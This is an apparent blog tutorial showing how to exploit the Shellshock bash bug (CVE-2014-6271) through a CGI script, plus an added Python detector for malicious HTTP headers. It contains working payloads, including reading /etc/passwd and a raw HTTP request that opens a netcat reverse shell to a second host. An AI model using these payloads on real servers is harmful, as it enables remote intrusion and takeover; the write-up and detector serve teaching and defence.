Exploiting Shellshock
A lot of news articles are currently being published about a series of bugs that were recently found in Bash. This post shows how easily a remote exploit can be written for the first of these bugs (CVE-2014-6271).
Let us first try to understand how this exploit works. The test code found on many sites to check whether a bash installation is vulnerable is the following:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If this code is executed on a vulnerable system, the output will be
vulnerable
this is a test
The command "env" is used to set a specific variable (in this example "$x") in the environment before our test command "echo this is a test" is executed. The vulnerability is that bash interprets a variable value beginning with the string "() {" as a function definition and, while importing it, also executes the commands that follow the function body, before the desired command is run. Note that the name of the variable does not matter for the vulnerability to work.
Let us look at how this can be used to remotely exploit a web server that uses a bash script to deliver web pages. In order to investigate what happens here, we set up a small CGI script with the following content:
#!/bin/bash
echo
env
If we browse to this page, we get a listing of all environment variables that are set while our web page is generated. Let us browse to this page again, this time setting some extra HTTP headers beforehand. I used the Firefox add-on "Modify Headers" to add the two HTTP headers "Foo: bar" and "Cookie: spam=ham".
What we see in the response is that several headers coming from the client are set as environment variables during execution. Into each of these variables we can inject malicious code, and this code will be executed before the web page is delivered, regardless of whether the variable is used by the script or not. Let us assume the web server executes the following Hello-World web page:
#!/bin/bash
echo
echo "Hello World!"
Note that the web page itself does not use any user input at all; it just statically prints "Hello World!". However, as we have seen before, bash still processes our input.
We can first try to inject the example test code. Note that we have to add an empty "echo" to the example in order to get the output into the body of the HTTP response (Apache will interpret it as a response header otherwise).
Instead of doing a simple echo, we can execute arbitrary code on the server, such as "cat /etc/passwd".
And of course open a reverse shell:
% echo |nc 192.168.122.27 80 <<EOF
GET /cgi-bin/bash.cgi HTTP/1.1
Host: foo
Foo: () { :; }; /bin/nc -e /bin/bash 192.168.122.1 2222;
EOF
I hope everyone now understands that Shellshock can be exploited very easily. Patches are available and should be installed as soon as possible.
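As an added defender-side example (not part of the original post), the following Python inspects an HTTP request the way the CGI gateway above exposes headers to the script: it maps each header to the HTTP_* environment variable name it would receive and flags any value that begins with the "() {" function prefix bash imports. The sample request is constructed here to match the one sent to bash.cgi above; the function names are my own.

```python
import re
from typing import Dict, List, Tuple

# Unpatched bash imported any environment variable whose value starts with
# "() {" as a function definition and kept parsing past the closing brace.
# Extra whitespace is tolerated so padded variants of the prefix are still caught.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Constructed sample request, shaped like the one sent to bash.cgi above,
# carrying the test payload from the beginning of the post in the Foo header.
SAMPLE_REQUEST = (
    "GET /cgi-bin/bash.cgi HTTP/1.1\r\n"
    "Host: foo\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Foo: () { :;}; echo vulnerable\r\n"
    "Cookie: spam=ham\r\n"
    "\r\n"
)


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the request headers as a dict with lower-cased names."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def cgi_env_name(header: str) -> str:
    """Environment variable name a CGI gateway gives a request header (RFC 3875)."""
    return "HTTP_" + header.upper().replace("-", "_")


def find_shellshock_headers(raw_request: str) -> List[Tuple[str, str]]:
    """List (env_var, value) pairs whose value bash would parse as a function definition."""
    findings: List[Tuple[str, str]] = []
    for name, value in parse_headers(raw_request).items():
        if SHELLSHOCK_PREFIX.match(value):
            findings.append((cgi_env_name(name), value))
    return findings


if __name__ == "__main__":
    for env_var, value in find_shellshock_headers(SAMPLE_REQUEST):
        print(f"suspicious header -> {env_var}={value!r}")
```

The same check can run over any header source a reverse proxy or WAF sees; what matters is that every header value reaching a bash CGI becomes an environment variable, so all of them need inspecting, not only Cookie or User-Agent.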